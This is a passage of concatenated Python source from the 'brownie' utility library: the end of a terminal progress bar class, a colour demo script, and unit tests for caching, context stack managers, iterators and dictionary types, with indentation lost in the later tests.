    # removed from the class namespace right after building the property.
    step = property(get_step, set_step)
    del get_step, set_step

    def __iter__(self):
        return self

    def get_widgets_by_priority(self):
        """
        Returns an iterable of tuples consisting of the position of the widget
        and the widget itself ordered by each widgets priority.
        """
        return sorted(
            enumerate(self.widgets),
            key=lambda x: x[1].priority,
            reverse=True
        )

    def get_usable_width(self):
        """
        Returns the width usable by all widgets which don't provide a size
        hint.
        """
        return self.writer.get_usable_width() - sum(
            widget.size_hint(self) for widget in self.widgets
            if widget.provides_size_hint
        )

    def write(self, string, update=True):
        # When updating, return to the beginning of the line with '\r' so
        # the previous rendering of the bar is overwritten in place.
        if update:
            self.writer.write('\r', escape=False, flush=False)
            self.writer.begin_line()
        self.writer.write(string)

    def make_writer(updating=True, finishing=False):
        # Class-body decorator factory: wraps init/next/finish so each only
        # has to render a single widget; the wrapper handles stepping, width
        # accounting, priority ordering and the actual terminal write.
        def decorate(func):
            @wraps(func)
            def wrapper(self, **kwargs):
                if finishing and self.step == self.maxsteps:
                    return
                if updating and not finishing:
                    self.step += kwargs.get('step', 1)
                parts = []
                remaining_width = self.get_usable_width()
                # Higher-priority widgets render first and consume width;
                # size-hinted widgets were already accounted for above.
                for i, widget in self.get_widgets_by_priority():
                    part = func(self, widget, remaining_width, **kwargs)
                    if not widget.provides_size_hint:
                        remaining_width -= len(part)
                    parts.append((i, part))
                # Restore the widgets' original left-to-right order.
                parts.sort()
                self.write(''.join(part for _, part in parts), update=updating)
                if finishing:
                    self.writer.newline()
            return wrapper
        return decorate

    @make_writer(updating=False)
    def init(self, widget, remaining_width, **kwargs):
        """
        Writes the initial progress bar to the terminal.
        """
        return widget.init(self, remaining_width, **kwargs)

    @make_writer()
    def next(self, widget, remaining_width, step=1, **kwargs):
        """
        Writes an updated version of the progress bar to the terminal.

        If the update corresponds to multiple steps, pass the number of steps
        which have been made as an argument. If `step` is larger than
        `maxsteps` a :exc:`ValueError` is raised.
        """
        return widget.update(self, remaining_width, **kwargs)

    @make_writer(finishing=True)
    def finish(self, widget, remaining_width, **kwargs):
        """
        Writes the finished version of the progress bar to the terminal.

        This method may be called even if `maxsteps` has not been reached or
        has not been defined.
        """
        return widget.finish(self, remaining_width, **kwargs)

    # The factory was only needed at class-creation time.
    del make_writer

    def __enter__(self):
        self.init()
        return self

    def __exit__(self, etype, evalue, traceback):
        # Only draw the finished bar on a clean exit.
        if etype is None:
            self.finish()

    def __repr__(self):
        return '%s(%r, %r, maxsteps=%r)' % (
            self.__class__.__name__, self.widgets, self.writer, self.maxsteps
        )
# Public API of this module.
__all__ = [
    'ProgressBar', 'TextWidget', 'HintWidget', 'PercentageWidget', 'BarWidget',
    'PercentageBarWidget', 'StepWidget', 'TimeWidget', 'DataTransferSpeedWidget'
]
########NEW FILE########
__FILENAME__ = __main__
# coding: utf-8
"""
brownie.terminal
~~~~~~~~~~~~~~~~
:copyright: 2010-2011 by Daniel Neuhäuser
:license: BSD, see LICENSE.rst for details
"""
import sys
from brownie.terminal import TerminalWriter, _colour_names, ATTRIBUTES
# Demo script: exercises every colour, attribute and nested-option
# combination the terminal writer supports, writing the results to stdout.
writer = TerminalWriter(sys.stdout)
for name in _colour_names:
    with writer.line():
        writer.write(name, text_colour=name)
    with writer.line():
        writer.write(name, background_colour=name)
for name in ATTRIBUTES:
    if name == 'reset':
        # 'reset' is not a renderable attribute, it clears all of them.
        continue
    writer.writeline(name, **{name: True})
# NOTE(review): indentation was lost in extraction; the symmetric
# "underline background text background underline" output suggests this
# nesting — confirm against the original brownie/terminal/__main__.py.
with writer.line():
    with writer.options(underline=True):
        writer.write('underline')
        with writer.options(background_colour='red'):
            writer.write('background')
            writer.write('text', text_colour='green')
            writer.write('background')
        writer.write('underline')
########NEW FILE########
__FILENAME__ = abstract
# coding: utf-8
"""
brownie.tests.abstract
~~~~~~~~~~~~~~~~~~~~~~
Tests for mod:`brownie.abstract`.
:copyright: 2010-2011 by Daniel Neuhäuser
:license: BSD, see LICENSE.rst for details
"""
import sys
from attest import Tests, TestBase, test_if, test, Assert
from brownie.itools import product
from brownie.abstract import VirtualSubclassMeta, ABCMeta, AbstractClassMeta
# abc (and therefore real ABCs) only exists on Python >= 2.6.
GE_PYTHON_26 = sys.version_info >= (2, 6)

tests = Tests()


@tests.test_if(GE_PYTHON_26)
def test_virtual_subclass_meta():
    # Classes using VirtualSubclassMeta must register themselves with every
    # ABC listed in virtual_superclasses.
    from abc import ABCMeta

    class Foo(object):
        __metaclass__ = ABCMeta

    class Bar(object):
        __metaclass__ = ABCMeta

    class Simple(object):
        __metaclass__ = VirtualSubclassMeta

        virtual_superclasses = [Foo, Bar]

    class InheritingSimple(Simple):
        pass

    for a, b in product([Simple, InheritingSimple], [Foo, Bar]):
        Assert.issubclass(a, b)
        Assert.isinstance(a(), b)

    Assert.issubclass(InheritingSimple, Simple)
    Assert.isinstance(InheritingSimple(), Simple)

    class Spam(object):
        __metaclass__ = ABCMeta

    class Eggs(object):
        __metaclass__ = ABCMeta

    class SimpleMonty(object):
        __metaclass__ = VirtualSubclassMeta

        virtual_superclasses = [Spam, Eggs]

    # Virtual superclasses must also be inherited through regular and
    # virtual multiple inheritance.
    class MultiInheritance(Simple, SimpleMonty):
        pass

    class MultiVirtualInheritance(object):
        __metaclass__ = VirtualSubclassMeta

        virtual_superclasses = [Simple, SimpleMonty]

    for virtual_super_cls in [Foo, Bar, Simple, Spam, Eggs, SimpleMonty]:
        Assert.issubclass(MultiInheritance, virtual_super_cls)
        Assert.isinstance(MultiInheritance(), virtual_super_cls)
class TestABCMeta(TestBase):
    @test_if(GE_PYTHON_26)
    def type_checks_work(self):
        # On >= 2.6 the compatibility ABCMeta must behave like abc.ABCMeta.
        class Foo(object):
            __metaclass__ = ABCMeta

        class Bar(object):
            pass

        Foo.register(Bar)
        Assert.issubclass(Bar, Foo)
        Assert.isinstance(Bar(), Foo)

    @test
    def api_works_cleanly(self):
        # Even without abc support, .register() must exist and not raise.
        class Foo(object):
            __metaclass__ = ABCMeta

        class Bar(object):
            pass

        Foo.register(Bar)


tests.register(TestABCMeta)


@tests.test_if(GE_PYTHON_26)
def test_abstract_class_meta():
    # AbstractClassMeta combines ABCMeta and VirtualSubclassMeta: Baz is a
    # virtual subclass of Bar and, transitively, of Foo.
    class Foo(object):
        __metaclass__ = ABCMeta

    class Bar(object):
        __metaclass__ = AbstractClassMeta

        virtual_superclasses = [Foo]

    class Baz(object):
        __metaclass__ = VirtualSubclassMeta

        virtual_superclasses = [Bar]

    Assert.issubclass(Baz, Foo)
    Assert.issubclass(Baz, Bar)
########NEW FILE########
__FILENAME__ = caching
# coding: utf-8
"""
brownie.tests.caching
~~~~~~~~~~~~~~~~~~~~~
Tests for :mod:`brownie.caching`.
:copyright: 2010-2011 by Daniel Neuhäuser
:license: BSD, see LICENSE.rst for details
"""
import time
from attest import Tests, Assert, TestBase, test
from brownie.caching import cached_property, LRUCache, LFUCache, memoize
tests = Tests()


@tests.test
def test_cached_property():
    class Foo(object):
        def __init__(self):
            self.counter = 0

        @cached_property
        def spam(self):
            self.counter += 1
            return self.counter

    # Accessing the descriptor on the class must return the descriptor
    # itself, not trigger a computation.
    Assert(Foo.spam).is_(Foo.spam)

    foo = Foo()
    # The first access computes the value; later accesses hit the cache.
    Assert(foo.spam) == 1
    Assert(foo.spam) == 1
class TestLRUCache(TestBase):
    @test
    def decorate(self):
        @LRUCache.decorate(2)
        def foo(*args, **kwargs):
            # Sleep so cached calls are measurably faster than uncached ones.
            time.sleep(.1)
            return args, kwargs

        tests = [
            (('foo', 'bar'), {}),
            (('foo', 'bar'), {'spam': 'eggs'}),
            ((1, 2), {})
        ]
        times = []
        for test in tests:
            args, kwargs = test
            old = time.time()
            Assert(foo(*args, **kwargs)) == test
            new = time.time()
            uncached_time = new - old

            old = time.time()
            Assert(foo(*args, **kwargs)) == test
            new = time.time()
            cached_time = new - old
            Assert(cached_time) < uncached_time
            times.append((uncached_time, cached_time))

        # maxsize is 2, so the first (least recently used) entry must have
        # been evicted and this call is slow again.
        old = time.time()
        foo(*tests[0][0], **tests[0][1])
        new = time.time()
        Assert(new - old) > times[0][1]

    @test
    def basics(self):
        cache = LRUCache(maxsize=2)
        cache[1] = 2
        cache[3] = 4
        cache[5] = 6
        # Inserting a third item evicts the least recently used one (key 1).
        Assert(cache.items()) == [(3, 4), (5, 6)]

    @test
    def repr(self):
        cache = LRUCache()
        Assert(repr(cache)) == 'LRUCache({}, inf)'


tests.register(TestLRUCache)
class TestLFUCache(TestBase):
    @test
    def basics(self):
        cache = LFUCache(maxsize=2)
        cache[1] = 2
        cache[3] = 4
        # Access key 3 so the usage frequencies differ before inserting a
        # new key.
        cache[3]
        cache[5] = 6
        Assert(cache.items()) == [(1, 2), (5, 6)]

    @test
    def repr(self):
        cache = LFUCache()
        Assert(repr(cache)) == 'LFUCache({}, inf)'


tests.register(TestLFUCache)


@tests.test
def test_memoize():
    @memoize
    def foo(a, b):
        return a + b
    # Repeated calls with the same arguments hit the cache; different
    # arguments compute fresh results.
    Assert(foo(1, 1)) == 2
    Assert(foo(1, 1)) == 2
    Assert(foo(1, 2)) == 3
########NEW FILE########
__FILENAME__ = context
# coding: utf-8
"""
brownie.tests.context
~~~~~~~~~~~~~~~~~~~~~
Tests for :mod:`brownie.context`.
:copyright: 2010-2011 by Daniel Neuhäuser
:license: BSD, see LICENSE.rst for details
"""
from __future__ import with_statement
import time
from Queue import Queue
from threading import Thread, Event
from attest import Tests, TestBase, Assert, test, test_if
try:
import eventlet
except ImportError:
eventlet = None
from brownie.context import (
ContextStackManagerBase, ContextStackManagerThreadMixin,
ContextStackManagerEventletMixin
)
class TestContextStackManagerBase(TestBase):
    @test
    def application_context(self):
        csm = ContextStackManagerBase()
        csm.push_application('foo')
        Assert(list(csm.iter_current_stack())) == ['foo']
        csm.push_application('bar')
        # The stack iterates from the most recently pushed object outwards.
        Assert(list(csm.iter_current_stack())) == ['bar', 'foo']
        Assert(csm.pop_application()) == 'bar'
        Assert(csm.pop_application()) == 'foo'
        with Assert.raises(RuntimeError):
            csm.pop_application()

    @test_if(eventlet)
    def context_inheritance(self):
        # A coroutine spawned inside a thread must see the thread's stack on
        # top of the application stack.
        class FooContextManager(
            ContextStackManagerEventletMixin,
            ContextStackManagerThreadMixin,
            ContextStackManagerBase
        ):
            pass

        csm = FooContextManager()
        csm.push_application('foo')

        def foo(csm, queue):
            csm.push_thread('bar')
            queue.put(list(csm.iter_current_stack()))
            eventlet.spawn(bar, csm, queue).wait()
            queue.put(list(csm.iter_current_stack()))

        def bar(csm, queue):
            csm.push_coroutine('baz')
            queue.put(list(csm.iter_current_stack()))

        queue = Queue()
        thread = Thread(target=foo, args=(csm, queue))
        thread.start()
        Assert(queue.get()) == ['bar', 'foo']
        Assert(queue.get()) == ['baz', 'bar', 'foo']
        Assert(queue.get()) == ['bar', 'foo']
        # Neither thread nor coroutine objects may leak into the main thread.
        Assert(list(csm.iter_current_stack())) == ['foo']


class ThreadContextStackManager(
    ContextStackManagerThreadMixin,
    ContextStackManagerBase
):
    pass
class TestContextStackManagerThreadMixin(TestBase):
    @test
    def inherits_application_stack(self):
        csm = ThreadContextStackManager()
        csm.push_application('foo')

        def foo(csm, queue):
            queue.put(list(csm.iter_current_stack()))
            csm.push_thread('bar')
            queue.put(list(csm.iter_current_stack()))

        queue = Queue()
        thread = Thread(target=foo, args=(csm, queue))
        thread.start()
        thread.join()
        Assert(queue.get()) == ['foo']
        Assert(queue.get()) == ['bar', 'foo']
        # Objects pushed in the spawned thread must not leak back here.
        Assert(list(csm.iter_current_stack())) == ['foo']

    @test
    def multiple_thread_contexts(self):
        csm = ThreadContextStackManager()

        def make_func(name):
            def func(csm, queue, event):
                csm.push_thread(name)
                queue.put(list(csm.iter_current_stack()))
                event.wait()
            func.__name__ = name
            return func

        foo_queue = Queue()
        bar_queue = Queue()
        foo_event = Event()
        bar_event = Event()
        foo_thread = Thread(
            target=make_func('foo'), args=(csm, foo_queue, foo_event)
        )
        bar_thread = Thread(
            target=make_func('bar'), args=(csm, bar_queue, bar_event)
        )
        foo_thread.start()
        # during that time foo should have pushed an object on
        # the thread local stack
        time.sleep(1)
        bar_thread.start()
        foo_event.set()
        bar_event.set()
        # Each thread only sees its own stack, the main thread sees neither.
        Assert(foo_queue.get()) == ['foo']
        Assert(bar_queue.get()) == ['bar']
        Assert(list(csm.iter_current_stack())) == []

    @test
    def basics(self):
        csm = ThreadContextStackManager()
        with Assert.raises(RuntimeError):
            csm.pop_thread()
        csm.push_thread('foo')
        Assert(list(csm.iter_current_stack())) == ['foo']
        csm.push_thread('bar')
        Assert(list(csm.iter_current_stack())) == ['bar', 'foo']
        Assert(csm.pop_thread()) == 'bar'
        Assert(list(csm.iter_current_stack())) == ['foo']


class EventletContextStackManager(
    ContextStackManagerEventletMixin,
    ContextStackManagerBase
):
    pass
class TestContextStackManagerEventletMixin(TestBase):
    # The coroutine tests only exist when eventlet is importable; otherwise
    # only the constructor failure is checked.
    if eventlet:
        @test
        def inherits_application_stack(self):
            csm = EventletContextStackManager()
            csm.push_application('foo')

            def foo(csm, queue):
                queue.put(list(csm.iter_current_stack()))
                csm.push_coroutine('bar')
                queue.put(list(csm.iter_current_stack()))

            queue = eventlet.Queue()
            greenthread = eventlet.spawn(foo, csm, queue)
            greenthread.wait()
            Assert(queue.get()) == ['foo']
            Assert(queue.get()) == ['bar', 'foo']

        @test
        def multiple_greenthread_contexts(self):
            csm = EventletContextStackManager()

            def make_func(name):
                def func(csm, queue):
                    csm.push_coroutine(name)
                    queue.put(list(csm.iter_current_stack()))
                func.__name__ = name
                return func

            foo_queue = eventlet.Queue()
            bar_queue = eventlet.Queue()
            foo = eventlet.spawn(make_func('foo'), csm, foo_queue)
            bar = eventlet.spawn(make_func('bar'), csm, bar_queue)
            foo.wait()
            bar.wait()
            # Each greenthread only sees its own coroutine stack.
            Assert(foo_queue.get()) == ['foo']
            Assert(bar_queue.get()) == ['bar']

        @test
        def basics(self):
            csm = EventletContextStackManager()
            with Assert.raises(RuntimeError):
                csm.pop_coroutine()
            csm.push_coroutine('foo')
            Assert(list(csm.iter_current_stack())) == ['foo']
            csm.push_coroutine('bar')
            Assert(list(csm.iter_current_stack())) == ['bar', 'foo']
            Assert(csm.pop_coroutine()) == 'bar'
            Assert(list(csm.iter_current_stack())) == ['foo']
    else:
        @test
        def init(self):
            # Without eventlet the mixin must refuse to be instantiated.
            with Assert.raises(RuntimeError):
                EventletContextStackManager()


tests = Tests([
    TestContextStackManagerBase, TestContextStackManagerThreadMixin,
    TestContextStackManagerEventletMixin
])
########NEW FILE########
__FILENAME__ = iterators
# coding: utf-8
"""
brownie.tests.datastructures.iterators
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Tests for :mod:`brownie.datastructures.iterators`.
:copyright: 2010-2011 by Daniel Neuhäuser
:license: BSD, see LICENSE.rst for details
"""
from __future__ import with_statement
from attest import Tests, TestBase, test, Assert
from brownie.datastructures import PeekableIterator
class TestPeekableIterator(TestBase):
    @test
    def iter(self):
        original = range(10)
        iterator = PeekableIterator(original)
        for item, expected in zip(original, iterator):
            Assert(item) == expected

    @test
    def iter_returns_self(self):
        iterator = PeekableIterator(range(10))
        Assert(iter(iterator)).is_(iterator)

    @test
    def peek(self):
        iterator = PeekableIterator(range(10))
        # Peeking zero or a negative number of items makes no sense.
        with Assert.raises(ValueError):
            iterator.peek(0)
        with Assert.raises(ValueError):
            iterator.peek(-1)
        # Peeking past the end returns what is left, without consuming it.
        Assert(iterator.peek(11)) == range(10)
        Assert(iterator.peek(10)) == range(10)
        for item, expected in zip(iterator, range(10)):
            Assert(item) == expected

        iterator = PeekableIterator(range(10))
        # Peeking is idempotent and never advances the iterator.
        Assert(iterator.peek()) == iterator.peek()
        Assert(iterator.peek()) == [0]
        Assert(iterator.peek(10)) == range(10)
        Assert(iterator.peek(5)) == range(5)

    @test
    def repr(self):
        original = iter(xrange(10))
        iterator = PeekableIterator(original)
        Assert(repr(iterator)) == 'PeekableIterator(%r)' % iter(original)


tests = Tests([TestPeekableIterator])
########NEW FILE########
__FILENAME__ = mappings
# coding: utf-8
"""
brownie.tests.datastructures.mappings
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Tests for :mod:`brownie.datastructures.mappings`.
:copyright: 2010-2011 by Daniel Neuhäuser
:license: BSD, see LICENSE.rst for details
"""
from __future__ import with_statement
import sys
import pickle
from attest import Tests, TestBase, test, test_if, Assert
from brownie.datastructures import (
ImmutableDict,
CombinedDict,
MultiDict,
ImmutableMultiDict,
CombinedMultiDict,
OrderedDict,
OrderedMultiDict,
ImmutableOrderedDict,
ImmutableOrderedMultiDict,
FixedDict,
Counter
)
GE_PYTHON_26 = sys.version_info >= (2, 6)
class DictTestMixin(object):
dict_class = None
@test
def fromkeys(self):
d = self.dict_class.fromkeys([1, 2])
Assert(d[1]) == None
Assert(d[2]) == None
d = self.dict_class.fromkeys([1, 2], 'foo')
Assert(d[1]) == 'foo'
Assert(d[2]) == 'foo'
Assert(d.__class__).is_(self.dict_class)
@test
def init(self):
data = [(1, 2), (3, 4)]
with Assert.raises(TypeError):
self.dict_class(*data)
for mapping_type in [lambda x: x, self.dict_class]:
d = self.dict_class(mapping_type(data))
Assert(d[1]) == 2
Assert(d[3]) == 4
d = self.dict_class(foo='bar', spam='eggs')
Assert(d['foo']) == 'bar'
Assert(d['spam']) == 'eggs'
d = self.dict_class([('foo', 'bar'), ('spam', 'eggs')], foo='baz')
Assert(d['foo']) == 'baz'
Assert(d['spam']) == 'eggs'
@test
def copy(self):
d = self.dict_class()
Assert(d.copy()).is_not(d)
@test
def setitem(self):
d = self.dict_class()
d[1] = 2
Assert(d[1]) == 2
d[1] = 3
Assert(d[1]) == 3
@test
def getitem(self):
d = self.dict_class([(1, 2), (3, 4)])
Assert(d[1]) == 2
Assert(d[3]) == 4
@test
def delitem(self):
d = self.dict_class()
d[1] = 2
Assert(d[1]) == 2
del d[1]
with Assert.raises(KeyError):
del d[1]
@test
def get(self):
d = self.dict_class()
Assert(d.get(1)) == None
Assert(d.get(1, 2)) == 2
d = self.dict_class({1: 2})
Assert(d.get(1)) == 2
Assert(d.get(1, 3)) == 2
@test
def setdefault(self):
d = self.dict_class()
Assert(d.setdefault(1)) == None
Assert(d[1]) == None
Assert(d.setdefault(1, 2)) == None
Assert(d.setdefault(3, 4)) == 4
Assert(d[3]) == 4
@test
def pop(self):
d = self.dict_class()
d[1] = 2
Assert(d.pop(1)) == 2
with Assert.raises(KeyError):
d.pop(1)
Assert(d.pop(1, 2)) == 2
@test
def popitem(self):
d = self.dict_class([(1, 2), (3, 4)])
items = iter(d.items())
while d:
Assert(d.popitem()) == items.next()
@test
def clear(self):
d = self.dict_class([(1, 2), (3, 4)])
assert d
d.clear()
assert not d
@test
def item_accessor_equality(self):
d = self.dict_class([(1, 2), (3, 4)])
Assert(list(d)) == d.keys()
Assert(list(d.iterkeys())) == d.keys()
Assert(list(d.itervalues())) == d.values()
Assert(list(d.iteritems())) == d.items()
for key, value, item in zip(d.keys(), d.values(), d.items()):
Assert((key, value)) == item
Assert(d[key]) == value
@test
def update(self):
d = self.dict_class()
with Assert.raises(TypeError):
d.update((1, 2), (3, 4))
for mapping in ([(1, 2), (3, 4)], self.dict_class([(1, 2), (3, 4)])):
d.update(mapping)
Assert(d[1]) == 2
Assert(d[3]) == 4
d = self.dict_class()
d.update([('foo', 'bar'), ('spam', 'eggs')], foo='baz')
Assert(d['foo']) == 'baz'
Assert(d['spam']) == 'eggs'
@test
def repr(self):
d = self.dict_class()
Assert(repr(d)) == '%s()' % d.__class__.__name__
original = {1: 2}
d = self.dict_class(original)
Assert(repr(d)) == '%s(%s)' % (d.__class__.__name__, repr(original))
@test
def test_custom_new(self):
class D(self.dict_class):
def __new__(cls, *args, **kwargs):
return 42
Assert(D.fromkeys([])) == 42
@test
def picklability(self):
    # A pickle round-trip must preserve both the value and the exact type.
    d = self.dict_class([(1, 2), (3, 4)])
    pickled = pickle.loads(pickle.dumps(d))
    # BUG FIX: the original read `Assert(pickled == d)`, which merely wraps
    # an already-evaluated boolean and never asserts anything in attest;
    # the comparison has to be made *on* the Assert wrapper, as every
    # other assertion in this file does.
    Assert(pickled) == d
    Assert(pickled.__class__).is_(d.__class__)
class ImmutableDictTestMixin(DictTestMixin):
@test
def setitem(self):
for d in (self.dict_class(), self.dict_class({1: 2})):
with Assert.raises(TypeError):
d[1] = 2
@test
def delitem(self):
for d in (self.dict_class(), self.dict_class({1: 2})):
with Assert.raises(TypeError):
del d[1]
@test
def setdefault(self):
for d in (self.dict_class(), self.dict_class({1: 2})):
with Assert.raises(TypeError):
d.setdefault(1)
with Assert.raises(TypeError):
d.setdefault(1, 3)
@test
def pop(self):
d = self.dict_class()
with Assert.raises(TypeError):
d.pop(1)
with Assert.raises(TypeError):
d.pop(1, 2)
d = self.dict_class({1: 2})
with Assert.raises(TypeError):
d.pop(1)
@test
def popitem(self):
d = self.dict_class()
with Assert.raises(TypeError):
d.popitem()
@test
def update(self):
d = self.dict_class()
with Assert.raises(TypeError):
d.update([])
with Assert.raises(TypeError):
d.update(foo='bar')
@test
def clear(self):
d = self.dict_class()
with Assert.raises(TypeError):
d.clear()
class TestImmutableDict(TestBase, ImmutableDictTestMixin):
dict_class = ImmutableDict
@test_if(GE_PYTHON_26)
def type_checking(self):
Assert.isinstance(self.dict_class(), dict)
@test
def hashability(self):
a = self.dict_class([(1, 2), (3, 4)])
b = self.dict_class(a)
Assert(hash(a)) == hash(b)
Assert(hash(a)) != hash(ImmutableDict([(1, 2), (5, 6)]))
with Assert.raises(TypeError):
hash(ImmutableDict({1: []}))
class CombinedDictTestMixin(object):
# .fromkeys() doesn't work here, so we don't need that test
test_custom_new = None
@test
def fromkeys(self):
with Assert.raises(TypeError):
self.dict_class.fromkeys(['foo', 'bar'])
@test
def init(self):
with Assert.raises(TypeError):
self.dict_class(foo='bar')
self.dict_class([{}, {}])
@test
def getitem(self):
d = self.dict_class([{1: 2, 3: 4}, {1: 4, 3: 2}])
Assert(d[1]) == 2
Assert(d[3]) == 4
@test
def get(self):
d = self.dict_class()
Assert(d.get(1)) == None
Assert(d.get(1, 2)) == 2
d = self.dict_class([{1: 2}, {1: 3}])
Assert(d.get(1)) == 2
Assert(d.get(1, 4)) == 2
@test
def item_accessor_equality(self):
d = self.dict_class([{1: 2}, {1: 3}, {2: 4}])
Assert(d.keys()) == [1, 2]
Assert(d.values()) == [2, 4]
Assert(d.items()) == [(1, 2), (2, 4)]
Assert(list(d)) == list(d.iterkeys()) == d.keys()
Assert(list(d.itervalues())) == d.values()
Assert(list(d.iteritems())) == d.items()
@test
def repr(self):
Assert(repr(self.dict_class())) == '%s()' % self.dict_class.__name__
d = self.dict_class([{}, {1: 2}])
Assert(repr(d)) == '%s([{}, {1: 2}])' % self.dict_class.__name__
class TestCombinedDict(TestBase, CombinedDictTestMixin, ImmutableDictTestMixin):
dict_class = CombinedDict
@test_if(GE_PYTHON_26)
def type_checking(self):
d = self.dict_class()
Assert.isinstance(d, ImmutableDict)
Assert.isinstance(d, dict)
@test
def hashability(self):
a = CombinedDict([ImmutableDict({1: 2}), ImmutableDict({3: 4})])
Assert(hash(a)) == hash(CombinedDict(a.dicts))
Assert(hash(a)) != hash(CombinedDict(reversed(a.dicts)))
with Assert.raises(TypeError):
hash(CombinedDict([{}]))
class MultiDictTestMixin(object):
dict_class = None
@test
def init_with_lists(self):
d = self.dict_class({'foo': ['bar'], 'spam': ['eggs']})
Assert(d['foo']) == 'bar'
Assert(d['spam']) == 'eggs'
@test
def add(self):
d = self.dict_class()
d.add('foo', 'bar')
d.add('foo', 'spam')
Assert(d['foo']) == 'bar'
Assert(d.getlist('foo')) == ['bar', 'spam']
@test
def getlist(self):
d = self.dict_class()
Assert(d.getlist('foo')) == []
d = self.dict_class({'foo': 'bar'})
Assert(d.getlist('foo')) == ['bar']
d = self.dict_class({'foo': ['bar', 'spam']})
Assert(d.getlist('foo')) == ['bar', 'spam']
@test
def setlist(self):
d = self.dict_class()
d.setlist('foo', ['bar', 'spam'])
Assert(d['foo']) == 'bar'
Assert(d.getlist('foo')) == ['bar', 'spam']
@test
def setlistdefault(self):
d = self.dict_class()
Assert(d.setlistdefault('foo')) == [None]
Assert(d['foo']).is_(None)
Assert(d.setlistdefault('foo', ['bar'])) == [None]
Assert(d['foo']).is_(None)
Assert(d.setlistdefault('spam', ['eggs'])) == ['eggs']
Assert(d['spam']) == 'eggs'
@test
def multi_items(self):
d = self.dict_class({
'foo': ['bar'],
'spam': ['eggs', 'monty']
})
Assert(len(d.items())) == 2
Assert(len(d.items(multi=True))) == 3
Assert(d.items(multi=True)) == list(d.iteritems(multi=True))
keys = [pair[0] for pair in d.items(multi=True)]
Assert(set(keys)) == set(['foo', 'spam'])
values = [pair[1] for pair in d.items(multi=True)]
Assert(set(values)) == set(['bar', 'eggs', 'monty'])
@test
def lists(self):
d = self.dict_class({
'foo': ['bar', 'baz'],
'spam': ['eggs', 'monty']
})
Assert(d.lists()) == list(d.iterlists())
('foo', ['bar', 'baz']) in Assert(d.lists())
('spam', ['eggs', 'monty']) in Assert(d.lists())
@test
def update(self):
d = self.dict_class()
with Assert.raises(TypeError):
d.update((1, 2), (3, 4))
d.update({'foo': 'bar'})
Assert(d['foo']) == 'bar'
d.update([('foo', 'spam')])
Assert(d['foo']) == 'bar'
Assert(d.getlist('foo')) == ['bar', 'spam']
@test
def poplist(self):
d = self.dict_class({'foo': 'bar', 'spam': ['eggs', 'monty']})
Assert(d.poplist('foo')) == ['bar']
Assert(d.poplist('spam')) == ['eggs', 'monty']
Assert(d.poplist('foo')) == []
@test
def popitemlist(self):
d = self.dict_class({'foo': 'bar'})
Assert(d.popitemlist()) == ('foo', ['bar'])
with Assert.raises(KeyError):
d.popitemlist()
d = self.dict_class({'foo': ['bar', 'baz']})
Assert(d.popitemlist()) == ('foo', ['bar', 'baz'])
with Assert.raises(KeyError):
d.popitemlist()
@test
def repr(self):
d = self.dict_class()
Assert(repr(d)) == '%s()' % d.__class__.__name__
original = {1: [2, 3]}
d = self.dict_class(original)
Assert(repr(d)) == '%s(%s)' % (d.__class__.__name__, repr(original))
class TestMultiDict(TestBase, MultiDictTestMixin, DictTestMixin):
dict_class = MultiDict
@test_if(GE_PYTHON_26)
def type_checking(self):
Assert.isinstance(self.dict_class(), dict)
class ImmutableMultiDictTestMixin(MultiDictTestMixin):
@test
def add(self):
d = self.dict_class()
with Assert.raises(TypeError):
d.add(1, 2)
@test
def setlist(self):
d = self.dict_class()
with Assert.raises(TypeError):
d.setlist(1, [2, 3])
@test
def setlistdefault(self):
d = self.dict_class()
with Assert.raises(TypeError):
d.setlistdefault(1)
with Assert.raises(TypeError):
d.setlistdefault(1, [2, 3])
@test
def poplist(self):
for d in (self.dict_class(), self.dict_class({1: [2, 3]})):
with Assert.raises(TypeError):
d.poplist(1)
@test
def popitemlist(self):
for d in (self.dict_class(), self.dict_class({1: [2, 3]})):
with Assert.raises(TypeError):
d.popitemlist()
@test
def update(self):
d = self.dict_class()
with Assert.raises(TypeError):
d.update({1: 2})
with Assert.raises(TypeError):
d.update(foo='bar')
class TestImmutableMultiDict(TestBase, ImmutableMultiDictTestMixin,
ImmutableDictTestMixin):
dict_class = ImmutableMultiDict
@test_if(GE_PYTHON_26)
def type_checking(self):
d = self.dict_class()
types = [dict, ImmutableDict, MultiDict]
for type in types:
Assert.isinstance(d, type), type
@test
def hashability(self):
d = self.dict_class({1: [2, 3]})
Assert(hash(d)) == hash(self.dict_class(d))
with Assert.raises(TypeError):
hash(self.dict_class({1: [[]]}))
class TestCombinedMultiDict(TestBase, CombinedDictTestMixin,
ImmutableMultiDictTestMixin,
ImmutableDictTestMixin):
dict_class = CombinedMultiDict
# we don't need this special kind of initalization
init_with_lists = None
@test
def getlist(self):
d = self.dict_class()
Assert(d.getlist(1)) == []
d = self.dict_class([MultiDict({1: 2}), MultiDict({1: 3})])
Assert(d.getlist(1)) == [2, 3]
@test
def lists(self):
d = self.dict_class([
MultiDict({'foo': ['bar', 'baz']}),
MultiDict({'foo': ['spam', 'eggs']})
])
Assert(list(d.iterlists())) == d.lists()
Assert(d.lists()) == [('foo', ['bar', 'baz', 'spam', 'eggs'])]
@test
def listvalues(self):
d = self.dict_class([
MultiDict({'foo': ['bar', 'baz']}),
MultiDict({'foo': ['spam', 'eggs']})
])
Assert(list(d.iterlistvalues())) == d.listvalues()
Assert(d.listvalues()) == [['bar', 'baz', 'spam', 'eggs']]
@test
def multi_items(self):
d = self.dict_class([
MultiDict({'foo': ['bar', 'baz']}),
MultiDict({'foo': ['spam', 'eggs']})
])
Assert(list(d.iteritems(multi=True))) == d.items(multi=True)
Assert(d.items(multi=True)) == [
('foo', ['bar', 'baz', 'spam', 'eggs'])
]
@test
def item_accessor_equality(self):
CombinedDictTestMixin.item_accessor_equality(self)
d = self.dict_class([
MultiDict({'foo': ['bar', 'baz']}),
MultiDict({'foo': ['spam', 'eggs']})
])
Assert(d.values()) == [d['foo']]
Assert(d.lists()) == [(key, d.getlist(key)) for key in d]
Assert(d.items()) == [(k, vs[0]) for k, vs in d.lists()]
@test_if(GE_PYTHON_26)
def type_checking(self):
types = [dict, ImmutableDict, MultiDict, ImmutableMultiDict]
d = self.dict_class()
for type in types:
Assert.isinstance(d, type), type
class OrderedDictTestMixin(object):
dict_class = None
@test
def fromkeys_is_ordered(self):
d = self.dict_class.fromkeys([1, 2])
Assert(d.items()) == [(1, None), (2, None)]
d = self.dict_class.fromkeys([1, 2], 'foo')
